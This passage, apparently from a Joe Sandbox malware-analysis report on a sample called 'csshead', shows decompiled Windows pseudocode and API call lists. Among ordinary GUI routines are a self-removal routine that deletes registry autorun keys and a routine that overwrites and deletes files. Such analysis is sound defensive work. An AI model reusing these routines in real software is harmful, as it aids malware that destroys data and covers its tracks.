    				void* _t73;
    
    				_t72 =  &_v280;
    				_v280 = __ecx;
    				_t61 = GetParent( *(__ecx + 4));
    				_v272 = _t61;
    				_t53 = SendMessageA(_t61, 0x40c, 0, 0);
    				_t51 = 0;
    				_v276 = _t53;
    				if(_t53 <= 0) {
    					return 0;
    				} else {
    					do {
    						_t69 = 0x64;
    						_v148.dwOSVersionInfoSize = 0x94;
    						E00422840( &(_v148.dwMajorVersion), 0, 0x90);
    						_t73 = _t72 + 0xc;
    						if(GetVersionExA( &_v148) == 0 || _v148.dwMajorVersion < 6) {
    							L12:
    							_t69 = 0x50;
    						} else {
    							_v268 = 0;
    							_v264 = 0;
    							_v260 = 0;
    							_v256 = 0;
    							_v252 = 0;
    							_v268 = 0x14;
    							_t67 = LoadLibraryA("comctl32.dll");
    							if(_t67 != 0) {
    								_t47 = GetProcAddress(_t67, "DllGetVersion");
    								if(_t47 != 0) {
    									_t62 =  *_t47( &_v268);
    								} else {
    									_t62 = 0x80004001;
    								}
    								FreeLibrary(_t67);
    								_t50 = _t62;
    								_t61 = _v276;
    							} else {
    								_t50 = L00403AA0();
    							}
    							if(_t50 < 0 || _v268 < 6) {
    								goto L12;
    							}
    						}
    						_v248 = _t69;
    						_v244 = 0x11;
    						E00422840( &_v240, 0, 0x5c);
    						_t72 = _t73 + 0xc;
    						if(SendMessageA(_t61, 0x41d, _t51,  &_v248) == 0 || _v216 !=  *(_v280 + 4)) {
    							goto L15;
    						}
    						if((_v240 & 0x00000200) == 0) {
    							break;
    						}
    						PostMessageA(_t61, 0x42b, _t51, 0);
    						PostMessageA( *(_v280 + 4), 0x100, 0x28, 0);
    						return 1;
    						goto L20;
    						L15:
    						_t51 = _t51 + 1;
    					} while (_t51 < _v276);
    					return 0;
    				}
    				L20:
    			}

    APIs
    • GetParent.USER32(?), ref: 00411640
    • SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00411656
    • GetVersionExA.KERNEL32(?), ref: 0041169F
    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 004116D6
    • FreeLibrary.KERNEL32(00000000), ref: 0041170A
      • Part of subcall function 00403AA0: GetLastError.KERNEL32(00405D06), ref: 00403AA0
    • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 004116EF
    • SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 0041174F
    • PostMessageA.USER32(00000000,0000042B,00000000,00000000), ref: 00411797
    • PostMessageA.USER32(?,00000100,00000028,00000000), ref: 004117AA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 90%
    			E004080C0(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
    				struct HWND__* _t48;
    				intOrPtr _t50;
    				char* _t60;
    				char* _t62;
    				void* _t63;
    
    				_v8 = __eax;
    				if( *0x40a038 != 0) {
    					_t50 =  *0x40a038; // 0x0
    					 *0x40b4f8(_t50);
    				}
    				 *0x40c24c = CreateEventA(0, 0xffffffff, 0, 0);
    				 *0x40a29c = 0xffffffff;
    				_t13 =  *0x40c24c; // 0x0
    				WaitForSingleObject(_t13, 0xffffffff);
    				_t15 =  *0x40c24c; // 0x0
    				CloseHandle(_t15);
    				E00401308( &_v265, 0x40b518);
    				 *((char*)(_t63 + E004012DC(0x40b518) - 0x109)) = 0;
    				E0040133C( &_v265, ".lnk");
    				E0040471C( &_v265, 0, 0);
    				E0040471C(0x40b518, 0x7530, 0xffffffff);
    				if( *0x40a574 != 0) {
    					_t48 =  *0x40a574; // 0x0
    					SendMessageA(_t48, 0x10, 0, 0);
    				}
    				if( *0x40a034 == 0) {
    					if(_v8 == 0) {
    						_t27 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000001, _t27);
    					} else {
    						_t60 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000001, 0x40b752, _t60);
    					}
    					E00404A1C(0x80000001,  &_v265);
    				} else {
    					if(_v8 == 0) {
    						_t42 =  *0x40a260; // 0x4021a4
    						SHDeleteKeyA(0x80000002, _t42);
    					} else {
    						_t62 =  *0x40a260; // 0x4021a4
    						E00408064(0x80000002, 0x40b752, _t62);
    					}
    					E00404A1C(0x80000002,  &_v265);
    				}
    				_t31 =  *0x40b510; // 0x0
    				E00401828(_t31);
    				_t33 =  *0x40a054; // 0x0
    				ReleaseMutex(_t33);
    				_t35 =  *0x40a054; // 0x0
    				CloseHandle(_t35);
    				_t37 =  *0x40a2a0; // 0x0
    				asm("sbb eax, eax");
    				_t39 =  ~( ~_t37);
    				if(_t39 == 0) {
    					ExitProcess(0);
    				}
    				return _t39;
    			}

    APIs
    • RtlRemoveVectoredExceptionHandler.NTDLL(00000000), ref: 004080DB
    • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 004080E9
    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00408106
    • CloseHandle.KERNEL32(00000000), ref: 00408112
      • Part of subcall function 0040471C: CreateThread.KERNEL32(00000000,00000000,Function_00004608,?,00000000,?), ref: 00404777
      • Part of subcall function 0040471C: SetThreadPriority.KERNEL32(?,000000F1), ref: 00404786
      • Part of subcall function 0040471C: CloseHandle.KERNEL32(?), ref: 00404790
    • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 00408184
    • SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 004081BB
    • ExitProcess.KERNEL32 ref: 00408244
      • Part of subcall function 00408064: RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 0040808B
      • Part of subcall function 00408064: RegDeleteValueA.ADVAPI32(?,?), ref: 0040809D
    • SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 004081FB
      • Part of subcall function 00404A1C: RegDeleteValueA.ADVAPI32(?,?), ref: 00404A55
      • Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A
    • ReleaseMutex.KERNEL32(00000000), ref: 00408221
    • CloseHandle.KERNEL32(00000000), ref: 0040822D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 63%
    			E0041F4A0(void* __ecx, CHAR* _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16) {
    				CHAR* _v0;
    				intOrPtr _v8;
    				int _v12;
    				char _v24;
    				void* _v28;
    				void* __ebp;
    				struct HRSRC__* _t37;
    				void* _t38;
    				struct HINSTANCE__* _t43;
    				struct HBITMAP__* _t44;
    				int _t45;
    				char _t53;
    				signed int _t70;
    				struct HINSTANCE__* _t82;
    				struct HINSTANCE__* _t94;
    				struct HINSTANCE__* _t95;
    				void* _t96;
    				void* _t97;
    				short* _t99;
    				void* _t100;
    
    				_t95 =  *0x442b94; // 0x0
    				_t100 = __ecx;
    				_t37 = FindResourceA(_t95, _a4, 0xf1);
    				if(_t37 != 0) {
    					_t38 = LoadResource(_t95, _t37);
    					if(_t38 == 0) {
    						goto L1;
    					} else {
    						_t96 = LockResource(_t38);
    						if(_t96 == 0) {
    							goto L1;
    						} else {
    							_t70 =  *(_t96 + 6) & 0x0000ffff;
    							E00404A00(_t100,  *(_t96 + 2) & 0x0000ffff,  *(_t96 + 4) & 0x0000ffff);
    							if( *((intOrPtr*)(_t100 + 0x48)) != 0) {
    								L6:
    								_v8 =  *0x433034( *((intOrPtr*)(_t100 + 0x48)));
    								_v12 = 0;
    								if(_a4 == 0) {
    									if(( *(_t100 + 0x85) & 0x00000020) == 0) {
    										_t43 =  *0x442b94; // 0x0
    										_t44 = LoadBitmapA(_t43, _v0);
    										goto L11;
    									} else {
    										_t82 =  *0x442b94; // 0x0
    										L0041E6B0( &_v12, LoadImageA(_t82, _v0, 0, 0, 0, 0x2040));
    									}
    								} else {
    									_t94 =  *0x442b94; // 0x0
    									_t44 =  *0x433044(_t94, _v0, _a8 & 0x0000ffff, _a12, _a16);
    									L11:
    									_v12 = _t44;
    								}
    								_t45 = _v12;
    								if(_t45 == 0) {
    									goto L22;
    								} else {
    									_push( *((intOrPtr*)(_t100 + 0xa0)));
    									_push(_t45);
    									_push( *((intOrPtr*)(_t100 + 0x48)));
    									if( *0x433050() != 0xffffffff) {
    										if(_t70 > 0) {
    											_t99 = _t96 + 8;
    											do {
    												if( *_t99 != 0) {
    													L00401350(_t100 + 0x4c, _t99);
    												}
    												_t99 = _t99 + 2;
    												_t70 = _t70 - 1;
    											} while (_t70 != 0);
    										}
    										_t97 =  *0x433034( *((intOrPtr*)(_t100 + 0x48)));
    										if(_t97 ==  *((intOrPtr*)(_t100 + 0x50))) {
    											if(E00410BB0() != 0) {
    												_t53 = _v24;
    												_push(_t97 - _t53);
    												_push(_t53);
    												L0041EE80(_t100);
    											}
    											DeleteObject(_v28);
    											return 1;
    										} else {
    											DeleteObject(_v28);
    											goto L22;
    										}
    									} else {
    										L00411B80( &_v24);
    										return 0;
    									}
    								}
    							} else {
    								 *(_t100 + 0x85) =  *(_t100 + 0x85) ^ (E0041E1F0(_a4) << 0x00000005 ^  *(_t100 + 0x85)) & 0x00000020;
    								if(L0041E420(_t100,  *(_t96 + 6) & 0x0000ffff) == 0) {
    									L22:
    									return 0;
    								} else {
    									goto L6;
    								}
    							}
    						}
    					}
    				} else {
    					L1:
    					return 0;
    				}
    			}

    APIs
    • FindResourceA.KERNEL32(00000000,?,000000F1), ref: 0041F4B8
    • LoadResource.KERNEL32(00000000,00000000,?,?,?,?), ref: 0041F4CE
    • LockResource.KERNEL32(00000000,?,?,?,?), ref: 0041F4D9
      • Part of subcall function 00404A00: ImageList_GetImageCount.COMCTL32(?), ref: 00404A0B
      • Part of subcall function 00404A00: ImageList_Destroy.COMCTL32(?), ref: 00404A19
    • ImageList_GetImageCount.COMCTL32(00000000,00000000), ref: 0041F538
    • 80000008.COMCTL32(00000000,?,?,?,?), ref: 0041F56E
    • LoadImageA.USER32(00000000,?,00000000,00000000,00000000,00002040), ref: 0041F596
      • Part of subcall function 0041E6B0: DeleteObject.GDI32(00000000,00000000), ref: 0041E6C3
    • LoadBitmapA.USER32(00000000,?), ref: 0041F5B3
    • ImageList_AddMasked.COMCTL32(00000000,00000000,?), ref: 0041F5D1
    • ImageList_GetImageCount.COMCTL32(00000000), ref: 0041F611
    • DeleteObject.GDI32(00000000), ref: 0041F623
      • Part of subcall function 00410BB0: GetVersionExA.KERNEL32 ref: 00410BD6
    • DeleteObject.GDI32(00000000), ref: 0041F652
      • Part of subcall function 0041EE80: GetDC.USER32(00000000), ref: 0041EE8B
      • Part of subcall function 0041EE80: CreateCompatibleDC.GDI32(00000000), ref: 0041EE98
      • Part of subcall function 0041EE80: GetCurrentObject.GDI32(00000000,00000007), ref: 0041EEA3
      • Part of subcall function 0041EE80: SelectObject.GDI32(00000000,?), ref: 0041EEDA
      • Part of subcall function 0041EE80: DeleteDC.GDI32(00000000), ref: 0041EF7C
      • Part of subcall function 0041EE80: ReleaseDC.USER32(00000000,00000000), ref: 0041EF85
      • Part of subcall function 0041EE80: GetCurrentProcess.KERNEL32 ref: 0041F006
      • Part of subcall function 0041EE80: FlushInstructionCache.KERNEL32(00000000), ref: 0041F00D
      • Part of subcall function 0041EE80: SetWindowLongA.USER32(00000000,000000FC,?), ref: 0041F01A
      • Part of subcall function 00411B80: DeleteObject.GDI32 ref: 00411B8A
      • Part of subcall function 0041E1F0: FindResourceA.KERNEL32(00000000,?,00000002), ref: 0041E200
      • Part of subcall function 0041E1F0: LoadResource.KERNEL32(00000000,00000000), ref: 0041E208
      • Part of subcall function 0041E1F0: LockResource.KERNEL32(00000000), ref: 0041E20F
      • Part of subcall function 0041E420: ImageList_Create.COMCTL32(0041F52C,?,?,0041F52C,00000001), ref: 0041E452
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 90%
    			E00416570(void* __ecx, void* __eflags, int _a4, int _a8, long _a12, struct HHOOK__** _a16) {
    				long _v0;
    				void* __edi;
    				void* __esi;
    				struct HWND__* _t31;
    				struct HWND__* _t32;
    				long _t37;
    				void* _t38;
    				struct HHOOK__** _t46;
    				struct HINSTANCE__* _t47;
    				struct HHOOK__* _t48;
    				intOrPtr* _t50;
    				long _t52;
    				intOrPtr _t59;
    				intOrPtr _t61;
    				intOrPtr _t67;
    				struct HHOOK__** _t68;
    				void* _t69;
    				void* _t71;
    				void* _t73;
    				intOrPtr _t76;
    
    				_t73 = __eflags;
    				_t69 = __ecx;
    				_v0 = CallWindowProcA( *(__ecx + 0x40),  *(__ecx + 4), _a4, _a8, _a12);
    				L00415980(_t69, _t73);
    				_t63 =  *(_t69 + 4);
    				_t31 = GetParent( *(_t69 + 4));
    				_t66 = _t31;
    				_t32 = GetParent(_t31);
    				if(_t32 == 0) {
    					L2:
    					E004124F0(_t69 + 0x5c, _t66);
    					_t67 =  *0x433420;
    					SendMessageA( *(_t69 + 4), 0x41e, 0x14, 0);
    					SendMessageA( *(_t69 + 4), 0x430, 0, 0);
    					EnterCriticalSection(0x442b64);
    					_t76 =  *0x442a50; // 0x0
    					if(_t76 != 0) {
    						L5:
    						_t37 = GetCurrentThreadId();
    						_t59 =  *0x442a50; // 0x0
    						_t52 = _t37;
    						_a4 = _t52;
    						_t38 = L00414220(_t59,  &_a4);
    						_t78 = _t38;
    						if(_t38 != 0) {
    							_t20 = _t38 + 4;
    							 *_t20 =  *((intOrPtr*)(_t38 + 4)) + 1;
    							__eflags =  *_t20;
    						} else {
    							_push(8);
    							_t46 = E00423911( &_a4, _t67, _t69, _t78);
    							if(_t46 == 0) {
    								_t68 = 0;
    								__eflags = 0;
    							} else {
    								 *_t46 = 0;
    								_t46[1] = 0;
    								_t68 = _t46;
    							}
    							_t47 =  *0x442b90; // 0x0
    							_a16 = _t68;
    							_t48 = SetWindowsHookExA(3, 0x415b20, _t47, _t52);
    							if(_t68 != 0) {
    								_t81 = _t48;
    								if(_t48 != 0) {
    									 *_t68 = _t48;
    									_t68[1] = 1;
    									_t61 =  *0x442a50; // 0x0
    									E00414170(_t61,  &_a8, _t81,  &_a8,  &_a12);
    								}
    							}
    						}
    						L14:
    						LeaveCriticalSection(0x442b64);
    						 *(_t69 + 0x85) =  *(_t69 + 0x85) ^ (GetWindowLongA( *(_t69 + 4), 0xffffffec) >> 0x00000016 << 0x00000006 ^  *(_t69 + 0x85)) & 0x00000040;
    						return _v0;
    					}
    					_push(0xc);
    					_t50 = E00423911(_t63, _t67, _t69, _t76);
    					_t71 = _t71 + 4;
    					if(_t50 == 0) {
    						 *0x442a50 = 0;
    						goto L14;
    					} else {
    						 *_t50 = 0;
    						 *((intOrPtr*)(_t50 + 4)) = 0;
    						 *((intOrPtr*)(_t50 + 8)) = 0;
    						 *0x442a50 = _t50;
    						goto L5;
    					}
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					_t66 = _t32;
    					_t32 = GetParent(_t32);
    				} while (_t32 != 0);
    				goto L2;
    			}


    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 0041658D
      • Part of subcall function 00415980: GetVersionExA.KERNEL32(?,00000090), ref: 004159B5
      • Part of subcall function 00415980: SystemParametersInfoA.USER32(00000029,00000158,?,00000000), ref: 004159FA
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000031), ref: 00415A10
      • Part of subcall function 00415980: GetSystemMetrics.USER32(00000032), ref: 00415A1A
      • Part of subcall function 00415980: GetClientRect.USER32 ref: 00415AB9
    • GetParent.USER32(?), ref: 004165A8
    • GetParent.USER32(00000000), ref: 004165AD
    • GetParent.USER32(00000000), ref: 004165B8
      • Part of subcall function 004124F0: GetCurrentProcess.KERNEL32 ref: 00412525
      • Part of subcall function 004124F0: FlushInstructionCache.KERNEL32(00000000), ref: 0041252C
      • Part of subcall function 004124F0: SetWindowLongA.USER32(?,000000FC,00000000), ref: 0041253E
    • SendMessageA.USER32(?,0000041E,00000014,00000000), ref: 004165D9
    • SendMessageA.USER32(?,00000430,00000000,00000000), ref: 004165E6
    • EnterCriticalSection.KERNEL32(00442B64), ref: 004165ED
    • GetCurrentThreadId.KERNEL32 ref: 00416616
      • Part of subcall function 00414220: RaiseException.KERNEL32(C000008C,00000001,00000000,00000000), ref: 00414270
    • GetWindowLongA.USER32(00000000,000000EC), ref: 004166AB
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • SetWindowsHookExA.USER32(00000003,Function_00015B20,00000000,00000000), ref: 00416669
    • LeaveCriticalSection.KERNEL32(00442B64), ref: 0041669F
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 83%
    			E00405CB0(struct HINSTANCE__* _a4, WCHAR* _a8, CHAR** _a12, intOrPtr* _a16) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v18;
    				char _v288;
    				void* _v300;
    				void* __edi;
    				intOrPtr* _t49;
    				char _t53;
    				CHAR* _t57;
    				void* _t60;
    				CHAR* _t63;
    				char _t66;
    				CHAR* _t74;
    				void* _t75;
    				CHAR* _t79;
    				CHAR* _t82;
    				CHAR* _t87;
    				void* _t88;
    				int _t90;
    				CHAR* _t94;
    				void* _t99;
    				char _t104;
    				intOrPtr* _t111;
    				char _t118;
    				void* _t124;
    				long _t139;
    				CHAR* _t141;
    				WCHAR* _t148;
    				CHAR* _t152;
    				CHAR* _t157;
    				void* _t161;
    				void* _t162;
    				void* _t163;
    				void* _t165;
    				void* _t170;
    				void* _t171;
    				void* _t172;
    
    				_t111 = _a12;
    				_t163 = _t162 - 0x11c;
    				if(_t111 == 0) {
    					L37:
    					return 0x80004003;
    				} else {
    					_t49 = _a16;
    					if(_t49 == 0) {
    						goto L37;
    					} else {
    						 *_t111 = 0;
    						 *_t49 = 0;
    						_v8 = 0;
    						_t139 = GetModuleFileNameA(_a4,  &_v288, 0x104);
    						if(_t139 != 0) {
    							__eflags = _t139 - 0x104;
    							if(_t139 != 0x104) {
    								_t53 = L00404410( &_v288);
    								_t148 = _a8;
    								_t104 = _t53;
    								_v16 = _t104;
    								__eflags = _t148;
    								if(_t148 == 0) {
    									L18:
    									_a4 = lstrlenA( &_v288) + 1;
    									_t57 = E004036F0( &_a4, lstrlenA( &_v288) + 1, 2);
    									_t165 = _t163 + 0xc;
    									__eflags = _t57;
    									if(_t57 < 0) {
    										goto L13;
    									} else {
    										_t150 = _a4;
    										__eflags = _a4 - 0x400;
    										if(__eflags > 0) {
    											L23:
    											_t60 = L00405440( &_v8, _t139, _t150);
    										} else {
    											_t82 = L00404C30( &_v288, __eflags, _t150);
    											_t165 = _t165 + 4;
    											__eflags = _t82;
    											if(_t82 == 0) {
    												goto L23;
    											} else {
    												L00422450(_t150);
    												_t60 = _t165;
    											}
    										}
    										_t152 = E00401810(_t60,  &_v288, _t150 >> 1, 3);
    										__eflags = _t152;
    										if(_t152 == 0) {
    											goto L13;
    										} else {
    											_t141 =  *0x4332e0(_t152, _a16);
    											__eflags = _t141;
    											if(_t141 >= 0) {
    												L34:
    												_t63 =  *0x4332f0(_t152);
    												 *_a12 = _t63;
    												__eflags = _t63;
    												if(_t63 == 0) {
    													_t141 = 0x8007000e;
    												}
    												goto L36;
    											} else {
    												_t66 = ".tlb"; // 0x626c742e
    												_t118 =  *0x4359ac; // 0x0
    												_v16 = _t66;
    												_v12 = _t118;
    												__eflags = _t104 -  &_v288 + 5 - 0x104;
    												if(__eflags > 0) {
    													goto L22;
    												} else {
    													_t134 =  &_v18 - _t104;
    													L00403790(__eflags, _t104,  &_v18 - _t104,  &_v16);
    													_a4 = lstrlenA( &_v288) + 1;
    													_t74 = E004036F0( &_a4, lstrlenA( &_v288) + 1, 2);
    													_t170 = _t165 + 0x18;
    													__eflags = _t74;
    													if(_t74 < 0) {
    														goto L13;
    													} else {
    														_t155 = _a4;
    														__eflags = _a4 - 0x400;
    														if(__eflags > 0) {
    															L31:
    															_t75 = L00405440( &_v8, _t141, _t155);
    														} else {
    															_t79 = L00404C30(_t134, __eflags, _t155);
    															_t171 = _t170 + 4;
    															__eflags = _t79;
    															if(_t79 == 0) {
    																goto L31;
    															} else {
    																L00422450(_t155);
    																_t75 = _t171;
    															}
    														}
    														_t152 = E00401810(_t75,  &_v288, _t155 >> 1, 3);
    														__eflags = _t152;
    														if(_t152 == 0) {
    															goto L13;
    														} else {
    															_t141 =  *0x4332e0(_t152, _a16);
    															__eflags = _t141;
    															if(_t141 >= 0) {
    																goto L34;
    															}
    															L36:
    															L00404940( &_v8);
    															return _t141;
    														}
    													}
    												}
    											}
    										}
    									}
    								} else {
    									_a4 = lstrlenW(_t148) + 1;
    									_t87 = E004036F0( &_a4, lstrlenW(_t148) + 1, 2);
    									_t172 = _t163 + 0xc;
    									__eflags = _t87;
    									if(_t87 < 0) {
    										L13:
    										L00404940( &_v8);
    										return 0x8007000e;
    									} else {
    										_t108 = _a4;
    										__eflags = _a4 - 0x400;
    										if(__eflags > 0) {
    											L11:
    											_t88 = L00405440( &_v8, _t139, _t108);
    										} else {
    											_t94 = L00404C30( &_a4, __eflags, _t108);
    											_t172 = _t172 + 4;
    											__eflags = _t94;
    											if(_t94 == 0) {
    												goto L11;
    											} else {
    												L00422450(_t108);
    												_t88 = _t172;
    											}
    										}
    										_t157 = L00403720(_t88, _t148, _t108, 3);
    										__eflags = _t157;
    										if(_t157 != 0) {
    											_t90 = lstrlenA(_t157);
    											_t124 = _t90 + _t139;
    											__eflags = _t124 - _t139;
    											if(_t124 < _t139) {
    												L22:
    												L00404940( &_v8);
    												return 0x80004005;
    											} else {
    												__eflags = _t124 - _t90;
    												if(_t124 < _t90) {
    													goto L22;
    												} else {
    													__eflags = _t124 - 0x10e;
    													if(_t124 >= 0x10e) {
    														goto L22;
    													} else {
    														__eflags = 0x10e;
    														L00403790(0x10e, _t161 + _t139 - 0x11c, 0x10e - _t139, _t157);
    														_t104 = _v16;
    														_t163 = _t172 + 0xc;
    														goto L18;
    													}
    												}
    											}
    										} else {
    											goto L13;
    										}
    									}
    								}
    							} else {
    								L00404940( &_v8);
    								return 0x8007007a;
    							}
    						} else {
    							_t99 = L00403AA0();
    							L00404940( &_v8);
    							return _t99;
    						}
    					}
    				}
    			}


    APIs
    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00405CF5
      • Part of subcall function 00404410: CharNextA.USER32(?,00000000,?,00405D50), ref: 00404436
    • lstrlenW.KERNEL32(?), ref: 00405D61
      • Part of subcall function 00403720: WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,?,?,00000000,00000000,?,00405861,00000000,?,00000001,00000003,00000001), ref: 00403748
    • lstrlenA.KERNEL32(00000000,00000000,?,?,00000003,?), ref: 00405DD7
    • lstrlenA.KERNEL32(?), ref: 00405E13
      • Part of subcall function 00401810: MultiByteToWideChar.KERNEL32(00000001,00000000,00000003,000000FF,?,00000001,00000001,00401D0B,?,?,00000001,00000003), ref: 00401835
    • 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405E99
    • lstrlenA.KERNEL32(?), ref: 00405EE9
    • 800000A1.OLEAUT32(00000000,?,00000000,?,?,00000003,?), ref: 00405F57
    • 80000002.OLEAUT32(00000000), ref: 00405F64
      • Part of subcall function 00403AA0: GetLastError.KERNEL32(00405D06), ref: 00403AA0
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • __getptd.LIBCMT ref: 0042A95F
      • Part of subcall function 00425EEB: __amsg_exit.LIBCMT ref: 00425EFB
    • __getptd.LIBCMT ref: 0042A96D
      • Part of subcall function 00425CFE: RtlEncodePointer.NTDLL(00000000), ref: 00425D00
    • _CallSETranslator.LIBCMT ref: 0042A9A4
      • Part of subcall function 00423FC2: __getptd.LIBCMT ref: 0042404D
    • _GetRangeOfTrysToCheck.LIBCMT ref: 0042A9D2
      • Part of subcall function 0042A8D8: _UnwindNestedFrames.LIBCMT ref: 0042A902
      • Part of subcall function 0042AF11: RtlDecodePointer.NTDLL(0043CFE8), ref: 0042AF23
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 96%
    			E00404608(intOrPtr* _a4) {
    				int _v8;
    				CHAR* _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				long _v32;
    				char _v36;
    				void _v548;
    				signed int _t42;
    				char _t58;
    
    				_v8 = 0;
    				_v16 =  *_a4;
    				_v12 = _a4 + 4;
    				while(1) {
    					_t42 = E00403988(_v12);
    					asm("sbb eax, eax");
    					if( ~( ~_t42) == 0) {
    						break;
    					}
    					_v20 = CreateFileA(_v12, 0xc0000000, 0, 0, 3, 0x20000080, 0);
    					if(_v20 == 0xffffffff) {
    						L8:
    						_v8 = DeleteFileA(_v12);
    						if(_v8 != 0 || _v16 == 0) {
    							L13:
    							E00401440(_a4);
    							return _v8;
    						} else {
    							if(_v16 <= 0x64) {
    								Sleep(_v16);
    								_v16 = 0;
    							} else {
    								Sleep(0x64);
    								_v16 = _v16 - 0x64;
    							}
    							continue;
    						}
    					}
    					_v24 = GetFileSize(_v20, 0);
    					_t58 = (_v24 >> 9) + 1;
    					if(_t58 <= 0) {
    						L7:
    						FlushFileBuffers(_v20);
    						CloseHandle(_v20);
    						goto L8;
    					}
    					_v36 = _t58;
    					_v28 = 1;
    					do {
    						WriteFile(_v20,  &_v548, 0x200,  &_v32, 0);
    						_v28 = _v28 + 1;
    						_t21 =  &_v36;
    						 *_t21 = _v36 - 1;
    					} while ( *_t21 != 0);
    					goto L7;
    				}
    				_v8 = 0xffffffff;
    				goto L13;
    			}


    APIs
      • Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
      • Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF
    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,20000080,00000000), ref: 0040465B
    • GetFileSize.KERNEL32(000000FF,00000000), ref: 00404670
    • WriteFile.KERNEL32(000000FF,?,00000200,?,00000000), ref: 004046A4
    • FlushFileBuffers.KERNEL32(000000FF), ref: 004046B6
    • CloseHandle.KERNEL32(000000FF), ref: 004046C0
    • DeleteFileA.KERNEL32(?), ref: 004046CA
    • Sleep.KERNEL32(00000064), ref: 004046E7
    • Sleep.KERNEL32(00000064), ref: 004046FA
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 90%
    			E004080BE(intOrPtr __eax) {
    				intOrPtr _v8;
    				char _v265;
    				void* _t13;
    				void* _t15;
    				char* _t27;
    				intOrPtr _t31;
    				void* _t33;
    				void* _t35;
    				signed int _t37;
    				signed int _t39;
    				char* _t42;
